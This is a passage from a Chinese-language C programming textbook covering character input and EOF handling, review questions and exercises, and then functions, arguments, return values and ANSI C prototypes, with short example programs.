q 552 要写出一个自己十分满意的菜单界面并不容易。但是,在开发了一种可 行的方案后,可以在其他情况下复用这个菜单界面。 学完以上程序示例后,还要注意在处理较复杂的任务时,如何让函数把 任务委派给另一个函数。这样让程序更模块化。 553 8.8 关键概念 C程序把输入作为传入的字节流。getchar()函数把每个字符解释成一个 字符编码。scanf()函数以同样的方式看待输入,但是根据转换说明,它可以 把字符输入转换成数值。许多操作系统都提供重定向,允许用文件代替键盘 输入,用文件代替显示器输出。 程序通常接受特殊形式的输入。可以在设计程序时考虑用户在输入时可 能犯的错误,在输入验证部分处理这些错误情况,让程序更强健更友好。 对于一个小型程序,输入验证可能是代码中最复杂的部分。处理这类问 题有多种方案。例如,如果用户输入错误类型的信息,可以终止程序,也可 以给用户提供有限次或无限次机会重新输入。 554 8.9 本章小结 许多程序使用 getchar()逐字符读取输入。通常,系统使用行缓冲输入, 即当用户按下 Enter 键后输入才被传送给程序。按下Enter键也传送了一个换 行符,编程时要注意处理这个换行符。ANSI C把缓冲输入作为标准。 通过标准I/O包中的一系列函数,以统一的方式处理不同系统中的不同 文件形式,是C语言的特性之一。getchar()和 scanf()函数也属于这一系列。 当检测到文件结尾时,这两个函数都返回 EOF(被定义在stdio.h头文件 中)。在不同系统中模拟文件结尾条件的方式稍有不同。在UNIX系统中, 在一行开始处按下Ctrl+D可以模拟文件结尾条件;而在DOS系统中则使用 Ctrl+Z。 许多操作系统(包括UNIX和DOS)都有重定向的特性,因此可以用文 件代替键盘和屏幕进行输入和输出。读到EOF即停止读取的程序可用于键盘 输入和模拟文件结尾信号,或者用于重定向文件。 混合使用 getchar()和 scanf()时,如果在调用 getchar()之前,scanf()在输 入行留下一个换行符,会导致一些问题。不过,意识到这个问题就可以在程 序中妥善处理。 编写程序时,要认真设计用户界面。事先预料一些用户可能会犯的错 误,然后设计程序妥善处理这些错误情况。 555 8.10 复习题 复习题的参考答案在附录A中。 1.putchar(getchar())是一个有效表达式,它实现什么功能? getchar(putchar())是否也是有效表达式? 2.下面的语句分别完成什么任务? a.putchar('H'); b.putchar('\007'); c.putchar('\n'); d.putchar('\b'); 3.假设有一个名为 count 的可执行程序,用于统计输入的字符数。设计 一个使用 count 程序统计essay文件中字符数的命令行,并把统计结果保存在 essayct文件中。 4.给定复习题3中的程序和文件,下面哪一条是有效的命令? a.essayct <essay b.count essay c.essay >count 5.EOF是什么? 6.对于给定的输出(ch是int类型,而且是缓冲输入),下面各程序段的 输出分别是什么? a.输入如下: 556 If you quit, I will.[enter] 程序段如下: while ((ch = getchar()) != 'i') putchar(ch); b.输入如下: Harhar[enter] 程序段如下: while ((ch = getchar()) != '\n') { putchar(ch++); putchar(++ch); } 7.C如何处理不同计算机系统中的不同文件和换行约定? 8.在使用缓冲输入的系统中,把数值和字符混合输入会遇到什么潜在的 问题? 557 8.11 编程练习 下面的一些程序要求输入以EOF终止。如果你的操作系统很难或根本无 法使用重定向,请使用一些其他的测试来终止输入,如读到&字符时停止。 1.设计一个程序,统计在读到文件结尾之前读取的字符数。 2.编写一个程序,在遇到 EOF 之前,把输入作为字符流读取。程序要 打印每个输入的字符及其相应的ASCII十进制值。注意,在ASCII序列中,空 格字符前面的字符都是非打印字符,要特殊处理这些字符。如果非打印字符 是换行符或制表符,则分别打印\n或\t。否则,使用控制字符表示法。例 如,ASCII的1是Ctrl+A,可显示为^A。注意,A的ASCII值是Ctrl+A的值加上 64。其他非打印字符也有类似的关系。除每次遇到换行符打印新的一行之 外,每行打印10对值。(注意:不同的操作系统其控制字符可能不同。) 3.编写一个程序,在遇到 EOF 之前,把输入作为字符流读取。该程序 要报告输入中的大写字母和小写字母的个数。假设大小写字母数值是连续 的。或者使用ctype.h库中合适的分类函数更方便。 4.编写一个程序,在遇到EOF之前,把输入作为字符流读取。该程序要 报告平均每个单词的字母数。不要把空白统计为单词的字母。实际上,标点 符号也不应该统计,但是现在暂时不同考虑这么多(如果你比较在意这点, 考虑使用ctype.h系列中的ispunct()函数)。 5.修改程序清单8.4的猜数字程序,使用更智能的猜测策略。例如,程序 最初猜50,询问用户是猜大了、猜小了还是猜对了。如果猜小了,那么下一 次猜测的值应是50和100中值,也就是75。如果这次猜大了,那么下一次猜 测的值应是50和75的中值,等等。使用二分查找(binary search)策略,如 果用户没有欺骗程序,那么程序很快就会猜到正确的答案。 6.修改程序清单8.8中的get_first()函数,让该函数返回读取的第1个非空 白字符,并在一个简单的程序中测试。 558 7.修改第7章的编程练习8,用字符代替数字标记菜单的选项。用q代替5 作为结束输入的标记。 8.编写一个程序,显示一个提供加法、减法、乘法、除法的菜单。获得 用户选择的选项后,程序提示用户输入两个数字,然后执行用户刚才选择的 操作。该程序只接受菜单提供的选项。程序使用float类型的变量储存用户输 入的数字,如果用户输入失败,则允许再次输入。进行除法运算时,如果用 户输入0作为第2个数(除数),程序应提示用户重新输入一个新值。该程序 的一个运行示例如下: Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide q. quit a Enter first number: 22 .4 Enter second number: one one is not an number. Please enter a number, such as 2.5, -1.78E8, or 3: 1 22.4 + 1 = 23.4 Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide 559 q. quit d Enter first number: 18.4 Enter second number: 0 Enter a number other than 0: 0.2 18.4 / 0.2 = 92 Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide q. quit q Bye. 
560 第9章 函数 本章介绍以下内容: 关键字:return 运算符:*(一元)、&(一元) 函数及其定义方式 如何使用参数和返回值 如何把指针变量用作函数参数 函数类型 ANSI C原型 递归 如何组织程序?C的设计思想是,把函数用作构件块。我们已经用过C 标准库的函数,如printf()、scanf()、getchar()、putchar()和 strlen()。现在要进 一步学习如何创建自己的函数。前面章节中已大致介绍了相关过程,本章将 巩固以前学过的知识并做进一步的拓展。 561 9.1 复习函数 首先,什么是函数?函数(function)是完成特定任务的独立程序代码 单元。语法规则定义了函数的结构和使用方式。虽然C中的函数和其他语言 中的函数、子程序、过程作用相同,但是细节上略有不同。一些函数执行某 些动作,如printf()把数据打印到屏幕上;一些函数找出一个值供程序使用, 如strlen()把指定字符串的长度返回给程序。一般而言,函数可以同时具备以 上两种功能。 为什么要使用函数?首先,使用函数可以省去编写重复代码的苦差。如 果程序要多次完成某项任务,那么只需编写一个合适的函数,就可以在需要 时使用这个函数,或者在不同的程序中使用该函数,就像许多程序中使用 putchar()一样。其次,即使程序只完成某项任务一次,也值得使用函数。因 为函数让程序更加模块化,从而提高了程序代码的可读性,更方便后期修 改、完善。例如,假设要编写一个程序完成以下任务: 读入一系列数字; 分类这些数字; 找出这些数字的平均值; 打印一份柱状图。 可以使用下面的程序: #include <stdio.h> #define SIZE 50 int main(void) { 562 float list[SIZE]; readlist(list, SIZE); sort(list, SIZE); average(list, SIZE); bargraph(list, SIZE); return 0; } 当然,还要编写4个函数readlist()、sort()、average()和bargraph()的实现 细节。描述性的函数名能清楚地表达函数的用途和组织结构。然后,单独设 计和测试每个函数,直到函数都能正常完成任务。如果这些函数够通用,还 可以用于其他程序。 许多程序员喜欢把函数看作是根据传入信息(输入)及其生成的值或响 应的动作(输出)来定义的“黑盒”。如果不是自己编写函数,根本不用关心 黑盒的内部行为。例如,使用printf()时,只需知道给该函数传入格式字符串 或一些参数以及 printf()生成的输出,无需了解 printf()的内部代码。以这种 方式看待函数有助于把注意力集中在程序的整体设计,而不是函数的实现细 节上。因此,在动手编写代码之前,仔细考虑一下函数应该完成什么任务, 以及函数和程序整体的关系。 如何了解函数?首先要知道如何正确地定义函数、如何调用函数和如何 建立函数间的通信。我们从一个简单的程序示例开始,帮助读者理清这些内 容,然后再详细讲解。 9.1.1 创建并使用简单函数 我们的第1个目标是创建一个在一行打印40个星号的函数,并在一个打 563 印表头的程序中使用该函数。如程序清单9.1所示,该程序由main()和 starbar()组成。 程序清单9.1 lethead1.c程序 /* lethead1.c */ #include <stdio.h> #define NAME "GIGATHINK, INC." #define ADDRESS "101 Megabuck Plaza" #define PLACE "Megapolis, CA 94904" #define WIDTH 40 void starbar(void); /* 函数原型 */ int main(void) { starbar(); printf("%s\n", NAME); printf("%s\n", ADDRESS); printf("%s\n", PLACE); starbar();   /* 使用函数 */ return 0; } 564 void starbar(void) /* 定义函数  */ { int count; for (count = 1; count <= WIDTH; count++) putchar('*'); putchar('\n'); } 该程序的输出如下: **************************************** GIGATHINK, INC. 
101 Megabuck Plaza Megapolis, CA 94904 **************************************** 9.1.2 分析程序 该程序要注意以下几点。 程序在3处使用了starbar标识符:函数原型(function prototype)告诉编 译器函数starbar()的类型;函数调用(function call)表明在此处执行函数; 函数定义(function definition)明确地指定了函数要做什么。 函数和变量一样,有多种类型。任何程序在使用函数之前都要声明该函 数的类型。因此,在main()函数定义的前面出现了下面的ANSI C风格的函数 565 原型: void starbar(void); 圆括号表明starbar是一个函数名。第1个void是函数类型,void类型表明 函数没有返回值。第2个void(在圆括号中)表明该函数不带参数。分号表 明这是在声明函数,不是定义函数。也就是说,这行声明了程序将使用一个 名为starbar()、没有返回值、没有参数的函数,并告诉编译器在别处查找该 函数的定义。对于不识别ANSI C风格原型的编译器,只需声明函数的类 型,如下所示: void starbar(); 注意,一些老版本的编译器甚至连void都识别不了。如果使用这种编译 器,就要把没有返回值的函数声明为int类型。当然,最好还是换一个新的编 译器。 一般而言,函数原型指明了函数的返回值类型和函数接受的参数类型。 这些信息称为该函数的签名(signature)。对于starbar()函数而言,其签名是 该函数没有返回值,没有参数。 程序把 starbar()原型置于 main()的前面。当然,也可以放在 main()里面 的声明变量处。放在哪个位置都可以。 在main()中,执行到下面的语句时调用了starbar()函数: starbar(); 这是调用void类型函数的一种形式。当计算机执行到starbar();语句时, 会找到该函数的定义并执行其中的内容。执行完starbar()中的代码后,计算 机返回主调函数(calling function)继续执行下一行(本例中,主调函数是 main()),见图9.1(更确切地说,编译器把C程序翻译成执行以上操作的机 器语言代码)。 566 程序中strarbar()和main()的定义形式相同。首先函数头包括函数类型、 函数名和圆括号,接着是左花括号、变量声明、函数表达式语句,最后以右 花括号结束(见图9.2)。注意,函数头中的starbar()后面没有分号,告诉编 译器这是定义starbar(),而不是调用函数或声明函数原型。 程序把 starbar()和 main()放在一个文件中。当然,也可以把它们分别放 在两个文件中。把函数都放在一个文件中的单文件形式比较容易编译,而使 用多个文件方便在不同的程序中使用同一个函数。如果把函数放在一个单独 的文件中,要把#define 和#include 指令也放入该文件。我们稍后会讨论使用 多个文件的情况。现在,先把所有的函数都放在一个文件中。main()的右花 括号告诉编译器该函数结束的位置,后面的starbar()函数头告诉编译器 starbar()是一个函数。 567 图9.1 lethead1.c(程序清单9.1)的程序流 568 图9.2 简单函数的结构 starbar()函数中的变量count是局部变量(local variable),意思是该变 量只属于starbar()函数。可以在程序中的其他地方(包括main()中)使用 count,这不会引起名称冲突,它们是同名的不同变量。 如果把starbar()看作是一个黑盒,那么它的行为是打印一行星号。不用 给该函数提供任何输入,因为调用它不需要其他信息。而且,它没有返回 值,所以也不给 main()提供(或返回)任何信息。简而言之,starbar()不需 要与主调函数通信。 接下来介绍一个函数间需要通信的例子。 9.1.3 函数参数 在程序清单9.1的输出中,如果文字能居中,信头会更加美观。可以通 569 过在打印文字之前打印一定数量的空格来实现,这和打印一定数量的星号 (starbar()函数)类似,只不过现在要打印的是一定数量的空格。虽然这是 两个任务,但是任务非常相似,与其分别为它们编写一个函数,不如写一个 更通用的函数,可以在两种情况下使用。我们设计一个新的函数 show_n_char()(显示一个字符n次)。唯一要改变的是使用内置的值来显示 字符和重复的次数,show_n_char()将使用函数参数来传递这些值。 我们来具体分析。假设可用的空间是40个字符宽。调用show_n_char('*', 40)应该正好打印一行40个星号,就像starbar()之前做的那样。第2行 GIGATHINK, INT.的空格怎么处理?GIGATHINK, INT.是15个字符宽,所以 第1个版本中,文字后面有25个空格。为了让文字居中,文字的左侧应该有 12个空格,右侧有13个空格。因此,可以调用show_n_char('*', 12)。 show_n_char()与starbar()很相似,但是show_n_char()带有参数。从功能 上看,前者不会添加换行符,而后者会,因为show_n_char()要把空格和文本 打印成一行。程序清单9.2是修改后的版本。为强调参数的工作原理,程序 使用了不同的参数形式。 程序清单9.2 lethead2.c程序 /* lethead2.c */ #include <stdio.h> #include <string.h>     /* 为strlen()提供原型 */ #define NAME "GIGATHINK, INC." #define ADDRESS "101 Megabuck Plaza" #define PLACE "Megapolis, CA 94904" #define WIDTH 40 #define SPACE ' ' 570 void show_n_char(char ch, int num); int main(void) { int spaces; show_n_char('*', WIDTH);        /* 用符号常量作为参数 */ putchar('\n'); show_n_char(SPACE, 12);         /* 用符号常量作为参数 */ printf("%s\n", NAME); spaces = (WIDTH - strlen(ADDRESS)) / 2; /* 计算要跳过多少个空格*/ show_n_char(SPACE, spaces);       /* 用一个变量作为参数*/ printf("%s\n", ADDRESS); show_n_char(SPACE, (WIDTH - strlen(PLACE)) / 2); printf("%s\n", PLACE);         /* 用一个表达式作为参数  */ show_n_char('*', WIDTH); putchar('\n'); return 0; } /* show_n_char()函数的定义 */ 571 void show_n_char(char ch, int num) { int count; for (count = 1; count <= num; count++) putchar(ch); } 该函数的运行结果如下: **************************************** GIGATHINK, INC. 
101 Megabuck Plaza Megapolis, CA 94904 **************************************** 下面我们回顾一下如何编写一个带参数的函数,然后介绍这种函数的用 法。 9.1.4 定义带形式参数的函数 函数定义从下面的ANSI C风格的函数头开始: void show_n_char(char ch, int num) 该行告知编译器show_n_char()使用两个参数ch和num,ch是char类型, num是int类型。这两个变量被称为形式参数(formal argument,但是最近的标 准推荐使用formal parameter),简称形参。和定义在函数中变量一样,形式 572 参数也是局部变量,属该函数私有。这意味着在其他函数中使用同名变量不 会引起名称冲突。每次调用函数,就会给这些变量赋值。 注意,ANSI C要求在每个变量前都声明其类型。也就是说,不能像普 通变量声明那样使用同一类型的变量列表: void dibs(int x, y, z)     /* 无效的函数头 */ void dubs(int x, int y, int z) /* 有效的函数头 */ ANSI C也接受ANSI C之前的形式,但是将其视为废弃不用的形式: void show_n_char(ch, num) char ch; int num; 这里,圆括号中只有参数名列表,而参数的类型在后面声明。注意,普 通的局部变量在左花括号之后声明,而上面的变量在函数左花括号之前声 明。如果变量是同一类型,这种形式可以用逗号分隔变量名列表,如下所 示: void dibs(x, y, z) int x, y, z;   /* 有效 */ 当前的标准正逐渐淘汰 ANSI 之前的形式。读者应对此有所了解,以便 能看懂以前编写的程序,但是自己编写程序时应使用现在的标准形式(C99 和C11标准继续警告这些过时的用法即将被淘汰)。 虽然show_n_char()接受来自main()的值,但是它没有返回值。因此, show_n_char()的类型是void。 下面,我们来学习如何使用函数。 573 9.1.5 声明带形式参数函数的原型 在使用函数之前,要用ANSI C形式声明函数原型: void show_n_char(char ch, int num); 当函数接受参数时,函数原型用逗号分隔的列表指明参数的数量和类 型。根据个人喜好,你也可以省略变量名: void show_n_char(char, int); 在原型中使用变量名并没有实际创建变量,char仅代表了一个char类型 的变量,以此类推。再次提醒读者注意,ANSI C也接受过去的声明函数形 式,即圆括号内没有参数列表: void show_n_char(); 这种形式最终会从标准中剔除。即使没有被剔除,现在函数原型的设计 也更有优势(稍后会介绍)。了解这种形式的写法是为了以后读得懂以前写 的代码。 9.1.6 调用带实际参数的函数 在函数调用中,实际参数(actual argument,简称实参)提供了ch和num 的值。考虑程序清单9.2中第1次调用show_n_char(): show_n_char(SPACE, 12); 实际参数是空格字符和12。这两个值被赋给show_n_char()中相应的形式 参数:变量ch和num。简而言之,形式参数是被调函数(called function)中 的变量,实际参数是主调函数(calling function)赋给被调函数的具体值。 如上例所示,实际参数可以是常量、变量,或甚至是更复杂的表达式。无论 实际参数是何种形式都要被求值,然后该值被拷贝给被调函数相应的形式参 数。以程序清单 9.2 中最后一次调用show_n_char()为例: 574 show_n_char(SPACE, (WIDTH - strlen(PLACE)) / 2); 构成该函数第2个实际参数的是一个很长的表达式,对该表达式求值为 10。然后,10被赋给变量num。被调函数不知道也不关心传入的数值是来自 常量、变量还是一般表达式。再次强调,实际参数是具体的值,该值要被赋 给作为形式参数的变量(见图 9.3)。因为被调函数使用的值是从主调函数 中拷贝而来,所以无论被调函数对拷贝数据进行什么操作,都不会影响主调 函数中的原始数据。 注意 实际参数和形式参数 实际参数是出现在函数调用圆括号中的表达式。形式参数是函数定义的 函数头中声明的变量。调用函数时,创建了声明为形式参数的变量并初始化 为实际参数的求值结果。程序清单 9.2 中,'*'和WIDTH都是第1次调用 show_n_char()时的实际参数,而SPACE和11是第2次调用show_n_char()时的 实际参数。在函数定义中,ch和num都是该函数的形式参数。 575 图9.3 形式参数和实际参数 9.1.7 黑盒视角 从黑盒的视角看 show_n_char(),待显示的字符和显示的次数是输入。 执行后的结果是打印指定数量的字符。输入以参数的形式被传递给函数。这 些信息清楚地表明了如何在 main()中使用该函数。而且,这也可以作为编写 该函数的设计说明。 黑盒方法的核心部分是:ch、num和count都是show_n_char()私有的局部 变量。如果在main()中使用同名变量,那么它们相互独立,互不影响。也就 是说,如果main()有一个count变量,那么改变它的值不会改变show_n_char() 中的count,反之亦然。黑盒里发生了什么对主调函数是不可见的。 576 9.1.8 使用return从函数中返回值 前面介绍了如何把信息从主调函数传递给被调函数。反过来,函数的返 回值可以把信息从被调函数传回主调函数。为进一步说明,我们将创建一个 返回两个参数中较小值的函数。由于函数被设计用来处理int类型的值,所以 被命名为imin()。另外,还要创建一个简单的main(),用于检查imin()是否正 常工作。这种被设计用于测试函数的程序有时被称为驱动程序(driver), 该驱动程序调用一个函数。如果函数成功通过了测试,就可以安装在一个更 重要的程序中使用。程序清单9.3演示了这个驱动程序和返回最小值的函 数。 程序清单9.3 lesser.c程序 /* lesser.c -- 找出两个整数中较小的一个 */ #include <stdio.h> int imin(int, int); int main(void) { int evil1, evil2; printf("Enter a pair of integers (q to quit):\n"); while (scanf("%d %d", &evil1, &evil2) == 2) { printf("The lesser of %d and %d is %d.\n", evil1, evil2, imin(evil1, evil2)); printf("Enter a pair of integers (q to quit):\n"); 577 } printf("Bye.\n"); return 0; } int imin(int n, int m) { int min; if (n < m) min = n; else min = m; return min; } 回忆一下,scanf()返回成功读数据的个数,所以如果输入不是两个整数 会导致循环终止。下面是一个运行示例: Enter a pair of integers (q to quit): 509 333 The lesser of 509 and 333 is 333. Enter a pair of integers (q to quit): 578 -9393 6 The lesser of -9393 and 6 is -9393. Enter a pair of integers (q to quit): q Bye. 
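顺带补充一点：程序清单9.3的驱动程序依赖用户从键盘交互输入。测试这类小函数时，还有一种常见做法是把几组已知答案直接写进驱动程序，每次修改被测函数后重新编译运行，立即就能检查结果。下面是一个简短的示意（并非原书的程序清单，文件名 minitest.c 只是为了说明而取的；其中 imin() 的定义与程序清单9.3完全相同）：

/* minitest.c -- 用固定数据检查 imin()（示意） */
#include <stdio.h>
int imin(int, int);

int main(void)
{
    /* 逐组检查已知答案，结果不符时给出提示 */
    if (imin(509, 333) != 333)
        printf("imin(509, 333) 的结果不对!\n");
    if (imin(-9393, 6) != -9393)
        printf("imin(-9393, 6) 的结果不对!\n");
    if (imin(7, 7) != 7)
        printf("imin(7, 7) 的结果不对!\n");
    printf("检查结束。\n");
    return 0;
}

int imin(int n, int m)   /* 与程序清单9.3中的定义相同 */
{
    int min;
    if (n < m)
        min = n;
    else
        min = m;
    return min;
}

这种写法不需要每次手动输入数据，缺点是只覆盖写进程序里的那几种情况，所以它是交互式驱动程序的补充，而不是替代。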
关键字return后面的表达式的值就是函数的返回值。在该例中,该函数 返回的值就是变量min的值。因为min是int类型的变量,所以imin()函数的类 型也是int。 变量min属于imin()函数私有,但是return语句把min的值传回了主调函 数。下面这条语句的作用是把min的值赋给lesser: lesser = imin(n,m); 是否能像写成下面这样: imin(n,m); lesser = min; 不能。因为主调函数甚至不知道min的存在。记住,imin()中的变量是 imin()的局部变量。函数调用imin(evil1, evil2)只是把两个变量的值拷贝了一 份。 返回值不仅可以赋给变量,也可以被用作表达式的一部分。例如,可以 这样: answer = 2 * imin(z, zstar) + 25; printf("%d\n", imin(-32 + answer, LIMIT)); 579 返回值不一定是变量的值,也可以是任意表达式的值。例如,可以用以 下的代码简化程序示例: /* 返回最小值的函数,第2个版本 */ imin(int n,int m) { return (n < m) ? n : m; } 条件表达式的值是n和m中的较小者,该值要被返回给主调函数。虽然 这里不要求用圆括号把返回值括起来,但是如果想让程序条理更清楚或统一 风格,可以把返回值放在圆括号内。 如果函数返回值的类型与函数声明的类型不匹配会怎样? int what_if(int n) { double z = 100.0 / (double) n; return z; // 会发生什么? } 实际得到的返回值相当于把函数中指定的返回值赋给与函数类型相同的 变量所得到的值。因此在本例中,相当于把z的值赋给int类型的变量,然后 返回int类型变量的值。例如,假设有下面的函数调用: result = what_if(64); 虽然在what_if()函数中赋给z的值是1.5625,但是return语句返回确实int 580 类型的值1。 使用 return 语句的另一个作用是,终止函数并把控制返回给主调函数的 下一条语句。因此,可以这样编写imin(): /*返回最小值的函数,第3个版本*/ imin(int n,int m) { if (n < m) return n; else return m; } 许多C程序员都认为只在函数末尾使用一次return语句比较好,因为这样 做更方便浏览程序的人理解函数的控制流。但是,在函数中使用多个return 语句也没有错。无论如何,对用户而言,这3个版本的函数用起来都一样, 因为所有的输入和输出都完全相同,不同的是函数内部的实现细节。下面的 版本也没问题: /*返回最小值的函数,第4个版本*/ imin(int n, int m) { if (n < m) return n; 581 else return m; printf("Professor Fleppard is like totally a fopdoodle.\n"); } return语句导致printf()语句永远不会被执行。如果Fleppard教授在自己的 程序中使用这个版本的函数,可能永远不知道编写这个函数的学生对他的看 法。 另外,还可以这样使用return: return; 这条语句会导致终止函数,并把控制返回给主调函数。因为 return 后面 没有任何表达式,所以没有返回值,只有在void函数中才会用到这种形式。 9.1.9 函数类型 声明函数时必须声明函数的类型。带返回值的函数类型应该与其返回值 类型相同,而没有返回值的函数应声明为void类型。如果没有声明函数的类 型,旧版本的C编译器会假定函数的类型是int。这一惯例源于C的早期,那 时的函数绝大多数都是int类型。然而,C99标准不再支持int类型函数的这种 假定设置。 类型声明是函数定义的一部分。要记住,函数类型指的是返回值的类 型,不是函数参数的类型。例如,下面的函数头定义了一个带两个int类型参 数的函数,但是其返回值是double类型。 double klink(int a, int b) 要正确地使用函数,程序在第 1 次使用函数之前必须知道函数的类型。 方法之一是,把完整的函数定义放在第1次调用函数的前面。然而,这种方 582 法增加了程序的阅读难度。而且,要使用的函数可能在C库或其他文件中。 因此,通常的做法是提前声明函数,把函数的信息告知编译器。例如,程序 清单 9.3 中的main()函数包含以下几行代码: #include <stdio.h> int imin(int, int); int main(void) { int evil1, evil2, lesser; 第2行代码说明imin是一个函数名,有两个int类型的形参,且返回int类 型的值。现在,编译器在程序中调用imin()函数时就知道应该如何处理。 在程序清单9.3中,我们把函数的前置声明放在主调函数外面。当然, 也可以放在主调函数里面。例如,重写lesser.c(程序清单9.3)的开头部 分: #include <stdio.h> int main(void) { int imin(int, int); /* 声明imin()函数的原型*/ int evil1, evil2, lesser; 注意在这两种情况中,函数原型都声明在使用函数之前。 ANSI C标准库中,函数被分成多个系列,每一系列都有各自的头文 件。这些头文件中除了其他内容,还包含了本系列所有函数的声明。例如, stdio.h 头文件包含了标准 I/O 库函数(如,printf()和scanf())的声明。math.h 583 头文件包含了各种数学函数的声明。例如,下面的声明: double sqrt(double); 告知编译器sqrt()函数有一个double类型的形参,而且返回double类型的 值。不要混淆函数的声明和定义。函数声明告知编译器函数的类型,而函数 定义则提供实际的代码。在程序中包含 math.h 头文件告知编译器:sqrt()返 回double类型,但是sqrt()函数的代码在另一个库函数的文件中。 584 9.2 ANSI C函数原型 在ANSI C标准之前,声明函数的方案有缺陷,因为只需要声明函数的 类型,不用声明任何参数。下面我们看一下使用旧式的函数声明会导致什么 问题。 下面是ANSI之前的函数声明,告知编译器imin()返回int类型的值: int imin(); 然而,以上函数声明并未给出imin()函数的参数个数和类型。因此,如 果调用imin()时使用的参数个数不对或类型不匹配,编译器根本不会察觉出 来。 9.2.1 问题所在 我们看看与imax()函数相关的一些示例,该函数与imin()函数关系密 切。程序清单9.4演示了一个程序,用过去声明函数的方式声明了imax()函 数,然后错误地使用该函数。 程序清单9.4 misuse.c程序 /* misuse.c -- 错误地使用函数 */ #include <stdio.h> int imax();   /* 旧式函数声明 */ int main(void) { printf("The maximum of %d and %d is %d.\n",3, 5, imax(3)); printf("The maximum of %d and %d is %d.\n",3, 5,  585 imax(3.0, 5.0)); return 0; } int imax(n, m) int n, m; { return (n > m ? n : m); } 第1次调用printf()时省略了imax()的一个参数,第2次调用printf()时用两 个浮点参数而不是整数参数。尽管有些问题,但程序可以编译和运行。 下面是使用Xcode 4.6运行的输出示例: The maximum of 3 and 5 is 1606416656. The maximum of 3 and 5 is 3886. 
使用gcc运行该程序,输出的值是1359379472和1359377160。这两个编 译器都运行正常,之所以输出错误的结果,是因为它们运行的程序没有使用 函数原型。 到底是哪里出了问题?由于不同系统的内部机制不同,所以出现问题的 具体情况也不同。下面介绍的是使用P C和VA X的情况。主调函数把它的参 数储存在被称为栈(stack)的临时存储区,被调函数从栈中读取这些参数。 对于该例,这两个过程并未相互协调。主调函数根据函数调用中的实际参数 决定传递的类型,而被调函数根据它的形式参数读取值。因此,函数调用 imax(3)把一个整数放在栈中。当imax()函数开始执行时,它从栈中读取两个 586 整数。而实际上栈中只存放了一个待读取的整数,所以读取的第 2 个值是当 时恰好在栈中的其他值。 第2次使用imax()函数时,它传递的是float类型的值。这次把两个double 类型的值放在栈中(回忆一下,当float类型被作为参数传递时会被升级为 double类型)。在我们的系统中,两个double类型的值就是两个64位的值, 所以128位的数据被放在栈中。当imax()从栈中读取两个int类型的值时,它 从栈中读取前64位。在我们的系统中,每个int类型的变量占用32位。这些数 据对应两个整数,其中较大的是3886。 9.2.2 ANSI的解决方案 针对参数不匹配的问题,ANSI C标准要求在函数声明时还要声明变量 的类型,即使用函数原型(function prototype)来声明函数的返回类型、参 数的数量和每个参数的类型。未标明 imax()函数有两个 int 类型的参数,可 以使用下面两种函数原型来声明: int imax(int, int); int imax(int a, int b); 第1种形式使用以逗号分隔的类型列表,第2种形式在类型后面添加了变 量名。注意,这里的变量名是假名,不必与函数定义的形式参数名一致。 有了这些信息,编译器可以检查函数调用是否与函数原型匹配。参数的 数量是否正确?参数的类型是否匹配?以 imax()为例,如果两个参数都是数 字,但是类型不匹配,编译器会把实际参数的类型转换成形式参数的类型。 例如,imax(3.0, 5.0)会被转换成imax(3, 5)。我们用函数原型替换程序清单9.4 中的函数声明,如程序清单9.5所示。 程序清单9.5 proto.c程序 /* proto.c -- 使用函数原型 */ 587 #include <stdio.h> int imax(int, int);    /* 函数原型 */ int main(void) { printf("The maximum of %d and %d is %d.\n", 3, 5, imax(3)); printf("The maximum of %d and %d is %d.\n", 3, 5, imax(3.0, 5.0)); return 0; } int imax(int n, int m) { return (n > m ? n : m); } 编译程序清单9.5时,我们的编译器给出调用的imax()函数参数太少的错 误消息。 如果是类型不匹配会怎样?为探索这个问题,我们用imax(3, 5)替换 imax(3),然后再次编译该程序。这次编译器没有给出任何错误信息,程序 的输出如下: The maximum of 3 and 5 is 5. 588 The maximum of 3 and 5 is 5. 如上文所述,第2次调用中的3.0和5.0被转换成3和5,以便函数能正确地 处理输入。 虽然没有错误消息,但是我们的编译器还是给出了警告:double转换成 int可能会导致丢失数据。例如,下面的函数调用: imax(3.9, 5.4) 相当于: imax(3, 5) 错误和警告的区别是:错误导致无法编译,而警告仍然允许编译。一些 编译器在进行类似的类型转换时不会通知用户,因为C标准中对此未作要 求。不过,许多编译器都允许用户选择警告级别来控制编译器在描述警告时 的详细程度。 9.2.3 无参数和未指定参数 假设有下面的函数原型: void print_name(); 一个支持ANSI C的编译器会假定用户没有用函数原型来声明函数,它 将不会检查参数。为了表明函数确实没有参数,应该在圆括号中使用void关 键字: void print_name(void); 支持ANSI C的编译器解释为print_name()不接受任何参数。然后在调用 该函数时,编译器会检查以确保没有使用参数。 一些函数接受(如,printf()和scanf())许多参数。例如对于printf(),第1 589 个参数是字符串,但是其余参数的类型和数量都不固定。对于这种情况, ANSI C允许使用部分原型。例如,对于printf()可以使用下面的原型: int printf(const char *, ...); 这种原型表明,第1个参数是一个字符串(第11章中将详细介绍),可 能还有其他未指定的参数。 C库通过stdarg.h头文件提供了一个定义这类(形参数量不固定的)函数 的标准方法。第16章中详细介绍相关内容。 9.2.4 函数原型的优点 函数原型是C语言的一个强有力的工具,它让编译器捕获在使用函数时 可能出现的许多错误或疏漏。如果编译器没有发现这些问题,就很难觉察出 来。是否必须使用函数原型?不一定。你也可以使用旧式的函数声明(即不 用声明任何形参),但是这样做的弊大于利。 有一种方法可以省略函数原型却保留函数原型的优点。首先要明白,之 所以使用函数原型,是为了让编译器在第1次执行到该函数之前就知道如何 使用它。因此,把整个函数定义放在第1次调用该函数之前,也有相同的效 果。此时,函数定义也相当于函数原型。对于较小的函数,这种用法很普 遍: // 下面这行代码既是函数定义,也是函数原型 int imax(int a, int b) { return a > b ? a : b; } int main() { int x, z; ... 590 z = imax(x, 50); ... 
